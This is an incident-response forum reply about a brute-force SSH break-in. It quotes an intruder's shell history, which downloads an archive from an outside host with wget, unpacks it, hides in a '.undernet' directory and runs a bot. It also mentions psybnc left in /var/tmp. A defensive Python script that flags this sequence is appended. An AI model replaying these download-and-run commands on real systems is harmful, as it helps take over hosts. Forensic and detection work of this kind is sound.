
Re: brute force ssh attack



>Were there any interesting files in the users' home directories? (Look for
>hidden files too, of course -- maybe a hidden directory named ... or
>something.) Also check in /tmp and /var. And any luck with the
>.bash_history? (For both the users and for root....)

This is ~daikanyama/.bash_history
passwd
ls
w
wget www.ring.as.ro/x/qwe.tgz
tar zxvf qwe.tgz
rm -rf qwe.tgz
cd .undernet
./mech
./mech
./mech
./mech

There is a complex directory tree under ~daikanyama/.undernet

There are no interesting files under ~kevin.
Kevin had tcsh as login shell. Using ps aux, I have seen that kevin
used ftp, and kevin also used passwd.

One of the users compiled something; I have seen that they utilized
"make". Kevin installed some program, psybnc, under /var/tmp.

There is nothing interesting in /tmp and /root (root has tcsh as 
login shell). 









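An added example, not part of the original post: a heuristic pass over one user's shell history that flags the sequence seen above (download, unpack, delete the archive, change into a hidden directory, run a binary from it). The function name `triage_history`, the rule labels and the `FETCHERS`/`EXTRACTORS` lists are assumptions made for this illustration.

```python
import shlex
from pathlib import PurePosixPath

# History lines as quoted in the post above; nothing is fetched or executed here.
SAMPLE_HISTORY = """passwd
ls
w
wget www.ring.as.ro/x/qwe.tgz
tar zxvf qwe.tgz
rm -rf qwe.tgz
cd .undernet
./mech
./mech
./mech
./mech""".splitlines()

FETCHERS = {"wget", "curl", "fetch", "lynx"}   # assumed list of download tools
EXTRACTORS = {"tar", "unzip", "gunzip"}        # assumed list of unpackers

def triage_history(lines):
    """Return (line_no, rule, command) findings for one user's shell history."""
    findings, fetched, unpacked, cwd_hidden = [], set(), set(), False
    for no, raw in enumerate(lines, 1):
        try:
            argv = shlex.split(raw)
        except ValueError:            # unbalanced quotes: fall back to a plain split
            argv = raw.split()
        if not argv:
            continue
        cmd, args = argv[0], [a for a in argv[1:] if not a.startswith("-")]
        names = {PurePosixPath(a).name for a in args}   # file names without directories
        if cmd in FETCHERS and names:
            fetched |= names
            findings.append((no, "download", raw))
        elif cmd in EXTRACTORS and names & fetched:
            unpacked |= names & fetched
            findings.append((no, "extract-downloaded", raw))
        elif cmd == "rm" and names & unpacked:
            findings.append((no, "delete-archive-after-extract", raw))
        elif cmd == "cd":
            # any path component starting with a dot, other than . and .., is hidden
            parts = PurePosixPath(args[0]).parts if args else ()
            cwd_hidden = any(p.startswith(".") and p not in (".", "..") for p in parts)
            if cwd_hidden:
                findings.append((no, "cd-hidden-dir", raw))
        elif cmd.startswith("./") and cwd_hidden:
            findings.append((no, "exec-in-hidden-dir", raw))
    return findings
```

The working-directory tracking is approximate (it only looks at the most recent `cd`), so treat hits as pointers for manual review of the history file and the directory it names.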

